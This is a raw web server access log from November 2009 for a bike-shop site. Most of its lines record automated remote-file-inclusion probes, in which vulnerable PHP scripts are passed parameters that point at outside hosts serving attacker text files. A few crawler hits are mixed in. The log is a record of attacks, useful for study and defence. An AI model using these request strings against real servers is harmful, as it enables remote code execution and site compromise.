211.189.39.159 - - [10/Nov/2009:18:22:19 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.15 - - [10/Nov/2009:18:24:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "svbikes.com"
211.189.39.159 - - [10/Nov/2009:18:26:02 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.39.159 - - [10/Nov/2009:18:26:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.39.159 - - [10/Nov/2009:18:26:07 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
152.114.1.50 - - [10/Nov/2009:18:32:51 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
152.114.1.50 - - [10/Nov/2009:18:32:51 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
152.114.1.50 - - [10/Nov/2009:18:32:51 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.yeshouse.net/column/x.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
152.114.1.50 - - [10/Nov/2009:18:34:29 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
152.114.1.50 - - [10/Nov/2009:18:34:29 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
152.114.1.50 - - [10/Nov/2009:18:34:29 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.251.186.141 - - [10/Nov/2009:18:49:05 -0800] "GET //?_zb_path=http://medx-ray.com/html/id.txt??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.205.28.190 - - [10/Nov/2009:18:50:41 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.commoncounsel.org/plugins/index.html?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.205.28.190 - - [10/Nov/2009:18:50:41 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.commoncounsel.org/plugins/index.html?%0D?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.205.28.190 - - [10/Nov/2009:18:50:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.commoncounsel.org/plugins/index.html?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:53:46 -0800] "GET /logs/access.log%20%20///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:53:46 -0800] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:53:46 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:53:48 -0800] "GET /logs/access.log%20%20///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:53:48 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:53:48 -0800] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:55:12 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:55:12 -0800] "GET /logs/access.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:55:12 -0800] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:55:13 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:55:13 -0800] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.216.241.226 - - [10/Nov/2009:18:55:13 -0800] "GET /logs/access.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.85 - - [10/Nov/2009:18:58:29 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.112.85 - - [10/Nov/2009:18:58:30 -0800] "GET /?S=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:29:15 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:29:15 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:29:20 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:30:34 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:30:34 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:30:34 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:31:41 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:31:41 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:19:31:41 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [10/Nov/2009:19:35:39 -0800] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Nov/2009:19:35:39 -0800] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Nov/2009:19:35:40 -0800] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Nov/2009:19:35:41 -0800] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Nov/2009:19:35:42 -0800] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:19:49:29 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:19:49:29 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:19:49:29 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:19:55:10 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:19:55:10 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:19:55:10 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:19:55:31 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:19:55:31 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:19:55:33 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:20:25:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:20:25:27 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:20:25:27 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:20:25:27 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:20:25:48 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:20:25:48 -0800] "GET /translations/German.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:20:25:48 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:20:25:53 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:20:25:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:20:25:53 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [10/Nov/2009:20:25:53 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:20:30:16 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:31:12 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:31:12 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:31:12 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:31:44 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:31:45 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:31:45 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:32:14 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:32:14 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:32:14 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:33:26 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:33:28 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:33:29 -0800] "GET /logs/access.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:33:34 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:33:34 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.112.174 - - [10/Nov/2009:20:33:35 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://qqe.ru/forum/Packages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:20:33:39 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [10/Nov/2009:20:33:44 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:20:34:46 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.70.35.48 - - [10/Nov/2009:20:34:46 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:35:09 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:35:09 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:35:09 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.3.26.176 - - [10/Nov/2009:20:38:06 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.3.26.176 - - [10/Nov/2009:20:38:06 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.3.26.176 - - [10/Nov/2009:20:38:08 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.30 - - [10/Nov/2009:20:41:22 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=ventura5; (ventura5); (none); FunWebProducts; .NET CLR 1.0.3705)" "svbikes.com"
195.254.134.50 - - [10/Nov/2009:20:46:39 -0800] "GET ////?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 200 1766 "-" "-" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:48:41 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:20:49:19 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:20:49:19 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:20:49:19 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [10/Nov/2009:20:49:45 -0800] "GET /logs/access.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.3.26.176 - - [10/Nov/2009:20:55:25 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:20:55:56 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:20:55:56 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [10/Nov/2009:20:55:56 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:20:59:55 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:20:59:55 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [10/Nov/2009:21:00:19 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:10 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:10 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:24 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:24 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:58 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:58 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:01:58 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:14 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [10/Nov/2009:21:02:21 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.motociclete-de-vanzare.ro/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
